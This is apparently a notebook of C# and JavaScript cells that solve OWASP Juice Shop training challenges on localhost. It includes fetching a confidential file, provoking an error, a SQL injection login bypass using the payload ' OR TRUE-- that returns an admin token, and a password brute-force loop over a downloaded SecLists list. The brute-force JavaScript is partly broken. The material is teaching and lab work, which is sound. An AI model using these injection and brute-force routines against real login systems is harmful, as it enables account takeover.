# Demos of OWASP Juice Shop challenges

## Access a confidential document

In [ ]:
using System.Net.Http;

using(var client = new HttpClient()) {
    var response = await client.GetAsync("http://localhost:3000/ftp/acquisitions.md");

    Console.WriteLine(response.StatusCode);
}

OK


In [ ]:
const request = new XMLHttpRequest();
const url = 'http://localhost:3000/ftp/acquisitions.md';
request.open("GET", url);
request.send();

request.onload = (e) => {
    alert(request.response);
}

## Provoke an error that is neither very gracefully nor consistently handled
Any request that cannot be properly handled by the server will eventually be passed to a global error handling component that sends an error page to the client that includes a stack trace and other sensitive information. The restful API behaves in a similar way, passing back a JSON error object with sensitive data, such as SQL query strings.

In [ ]:
using System.Net.Http;

using(var client = new HttpClient()) {
    var response = await client.GetAsync("http://localhost:3000/rest/qwertz");

    Console.WriteLine(response.StatusCode);
}

InternalServerError


## Demonstrate a SQL Injection

In [ ]:
#!value --name json
{
    "email": "' OR TRUE--",
    "password": "12345"
}

In [ ]:
#r "nuget: System.Net.Http.Json, *-*"

Installed Packages System.Net.Http.Json, 6.0.2-mauipre.1.22054.8

In [ ]:
using System.Net.Http;
using System.Net.Http.Json;

In [ ]:
#!share json --from value

public struct AuthenticationToken {
    public Authentication Authentication {get;set;}
}

public struct Authentication {
    public string Token {get;set;}
    public int Bid {get;set;}
    public string Umail;
}

using(var client = new HttpClient()) {
    var content = new StringContent(json, Encoding.UTF8, "application/json");
    var response = await client.PostAsync("http://localhost:3000/rest/user/login", content);
    response.EnsureSuccessStatusCode();

    var actualtoken = await response.Content.ReadFromJsonAsync<AuthenticationToken>();
    Console.WriteLine(actualtoken.Authentication.Token);
}

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwidXNlcm5hbWUiOiIiLCJlbWFpbCI6ImFkbWluQGp1aWNlLXNoLm9wIiwicGFzc3dvcmQiOiIwMTkyMDIzYTdiYmQ3MzI1MDUxNmYwNjlkZjE4YjUwMCIsInJvbGUiOiJhZG1pbiIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIwLjAuMC4wIiwicHJvZmlsZUltYWdlIjoiYXNzZXRzL3B1YmxpYy9pbWFnZXMvdXBsb2Fkcy9kZWZhdWx0QWRtaW4ucG5nIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIyLTAyLTA5IDIyOjEzOjEzLjQxMiArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIyLTAyLTA5IDIyOjEzOjEzLjQxMiArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NDQ0NDUwMzAsImV4cCI6MTY0NDQ2MzAzMH0.tamlFvGGPfP-BfTLKBzX9LPU7rKm_iRCPkHNpNRF2aJqHjsbQxFjv1Rga8cZcMM-XDv_MRDrP52cSZhDYNnQYJeTDjJdlFeAyzr3v64FFZX2qvmXO6mLn89_K1jP44NjgAvwxQgRB-nYO0wWfl4LftbOvLZ1XoNfB2kcq_2oeI0


Now let's try the same example with plain javascript

In [ ]:
var request = new XMLHttpRequest();
var url = "http://localhost:3000/rest/user/login";
var json =
{
    "email": "' OR TRUE--",
    "password": "12345"
};

function reqListener () {
    console.log("Done...");
    console.log(this.responseText);
}
request.addEventListener("load", reqListener)
request.open("POST", url);
request.setRequestHeader("Content-Type", "application/json");
console.log("Sending...");
request.send(json);


Sending...

## Brute forcing login
So this is an attempt to brute force the admin login credentials by download the list of common passwords from: https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt and then iterate over the list, trying to login with each password as credential to the admin account.

In [ ]:
const passwordUrl = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt";
const localPasswordFile = "./passwords.txt";
const request = new XMLHttpRequest();
const url = 'http://localhost:3000/rest/user/login';

request.onerror = () => {
    console.log("Request failed");
};
request.onload = (e) => {
    console.log("Response received");
    var lines = request.response.split('\n');
    for(var line = 0; line < lines.length; line++){
        var password = lines[line];
        console.log("Testing password: " + password);
        const json =
        {
            "email": "admin",
            "password": password
        };
        var request = new XMLHttpRequest();
        request.open("POST", url);
        request.setRequestHeader("Content-Type", "application/json");
        request.send(json);
        
        request.onload = (e) => {
            if(request.status == 200) {
                console.log("Credentials found: " + password);
                throw new FatalError("Exiting...")
            }
        }
    }
}

request.open("GET", passwordUrl);
request.send();

console.log("Request sent");

Request sent